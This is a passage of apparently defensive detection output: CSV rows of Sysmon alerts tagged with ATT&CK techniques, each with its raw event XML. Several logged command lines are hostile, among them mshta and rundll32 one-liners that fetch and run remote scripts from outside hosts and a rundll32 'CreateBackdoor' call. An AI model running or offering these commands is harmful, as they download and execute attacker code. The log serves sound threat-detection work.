+[ T1218.005 ] Mshta found running in the system,1564435999.891564,2019-07-30T01:33:19.891564+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line (mshta.exe  javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd  /c mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:18.583990Z"">
+    </TimeCreated>
+    <EventRecordID>4904</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:18.451</Data>
+    <Data Name=""ProcessGuid"">747F3D96-661E-5D3F-0000-00107F248700</Data>
+    <Data Name=""ProcessId"">3164</Data>
+    <Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
+    <Data Name=""FileVersion"">11.00.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Microsoft (R) HTML Application host</Data>
+    <Data Name=""Product"">Internet Explorer</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">mshta.exe  javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=DD8B22ACEA424823BB64ABF71F61A03D41177C38,MD5=F328FDCFF05BF02C2C986D52AED8BC2A,SHA256=E616C5CE71886652C13E2E1FA45A653B44D492B054F16B15A38418B8507F57C7,IMPHASH=42DA177DE2FAA97C3DFAEC9562772A7F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-661E-5D3F-0000-0010A3148700</Data>
+    <Data Name=""ParentProcessId"">776</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:18.046159Z"">
+    </TimeCreated>
+    <EventRecordID>243527</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:17.682</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-001059841E00</Data>
+    <Data Name=""ProcessId"">8076</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-23T21:58:21.695842Z"">
+    </TimeCreated>
+    <EventRecordID>424175</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3208"" ThreadID=""4804"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-23 21:58:21.693</Data>
+    <Data Name=""ProcessGuid"">747F3D96-51FD-5F93-0000-00103B425E00</Data>
+    <Data Name=""ProcessId"">7504</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
+    <Data Name=""LogonId"">0x8a619</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-51F9-5F93-0000-0010551E5E00</Data>
+    <Data Name=""ParentProcessId"">9116</Data>
+    <Data Name=""ParentImage"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe  javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-21T15:32:57.286254Z"">
+    </TimeCreated>
+    <EventRecordID>4126</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3416"" ThreadID=""3496"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-21 15:32:57.276</Data>
+    <Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-00107BE42101</Data>
+    <Data Name=""ProcessId"">2920</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32.exe  javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
+    <Data Name=""LogonId"">0xc796</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-1A29-5CE4-0000-001054E32101</Data>
+    <Data Name=""ParentProcessId"">1532</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd.exe  /C rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1170] Detecting  Mshta,1564435999.891564,2019-07-30T01:33:19.891564+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line (mshta.exe  javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd  /c mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:18.583990Z"">
+    </TimeCreated>
+    <EventRecordID>4904</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:18.451</Data>
+    <Data Name=""ProcessGuid"">747F3D96-661E-5D3F-0000-00107F248700</Data>
+    <Data Name=""ProcessId"">3164</Data>
+    <Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
+    <Data Name=""FileVersion"">11.00.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Microsoft (R) HTML Application host</Data>
+    <Data Name=""Product"">Internet Explorer</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">mshta.exe  javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=DD8B22ACEA424823BB64ABF71F61A03D41177C38,MD5=F328FDCFF05BF02C2C986D52AED8BC2A,SHA256=E616C5CE71886652C13E2E1FA45A653B44D492B054F16B15A38418B8507F57C7,IMPHASH=42DA177DE2FAA97C3DFAEC9562772A7F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-661E-5D3F-0000-0010A3148700</Data>
+    <Data Name=""ParentProcessId"">776</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:18.046159Z"">
+    </TimeCreated>
+    <EventRecordID>243527</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:17.682</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-001059841E00</Data>
+    <Data Name=""ProcessId"">8076</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564845391.87585,2019-08-03T19:16:31.875850+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-03T15:16:31.779226Z"">
+    </TimeCreated>
+    <EventRecordID>5536</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2780"" ThreadID=""3676"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-03 15:16:31.676</Data>
+    <Data Name=""ProcessGuid"">747F3D96-A54F-5D45-0000-0010D83FA101</Data>
+    <Data Name=""ProcessId"">1716</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
+    <Data Name=""LogonId"">0x18d3b3</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-A54F-5D45-0000-0010C429A101</Data>
+    <Data Name=""ParentProcessId"">6080</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\dllhost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe  javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true); )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-21T15:32:57.286254Z"">
+    </TimeCreated>
+    <EventRecordID>4126</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3416"" ThreadID=""3496"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-21 15:32:57.276</Data>
+    <Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-00107BE42101</Data>
+    <Data Name=""ProcessId"">2920</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32.exe  javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
+    <Data Name=""LogonId"">0xc796</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-1A29-5CE4-0000-001054E32101</Data>
+    <Data Name=""ParentProcessId"">1532</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd.exe  /C rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T1086 ]  Powershell with Suspicious Argument,1611667274.399477,2021-01-26T17:21:14.399477+04:00,,Threat,Critical,"Found User (LAPTOP-JU4M3I0E\bouss) run Suspicious PowerShell commands that include (powershell,.cmd) in event with Command Line (powershell.exe   start-process notepad.exe) and Parent Image :C:\Windows\SysWOW64\cmd.exe , Parent CommandLine (&quot;C:\windows\system32\cmd.exe&quot;  /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd) in directory : ( C:\Users\bouss\source\repos\blabla\blabla\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-01-26T13:21:14.023510Z"">
+    </TimeCreated>
+    <EventRecordID>2429138</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""5272"" ThreadID=""6060"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>LAPTOP-JU4M3I0E</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2021-01-26 13:21:14.021</Data>
+    <Data Name=""ProcessGuid"">00247C92-174A-6010-0000-0010C0B2D92E</Data>
+    <Data Name=""ProcessId"">18548</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">10.0.18362.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">PowerShell.EXE</Data>
+    <Data Name=""CommandLine"">powershell.exe   start-process notepad.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\bouss\source\repos\blabla\blabla\</Data>
+    <Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
+    <Data Name=""LogonGuid"">00247C92-5082-600D-0000-0020A246F726</Data>
+    <Data Name=""LogonId"">0x26f746a2</Data>
+    <Data Name=""TerminalSessionId"">5</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=2223E8613BB0DD90888B17367007489FE16693E4,MD5=BCC5A6493E0641AA1E60CBF69469E579,SHA256=7762A4766BC394B4CB2D658144B207183FF23B3139181CD74E615DB63E6E57D6,IMPHASH=C6A0924236A2CDF364F3D2FAD87F702A</Data>
+    <Data Name=""ParentProcessGuid"">00247C92-1749-6010-0000-0010EFAAD92E</Data>
+    <Data Name=""ParentProcessId"">23168</Data>
+    <Data Name=""ParentImage"">C:\Windows\SysWOW64\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\windows\system32\cmd.exe&quot;  /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd</Data>
+  </EventData>
+</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
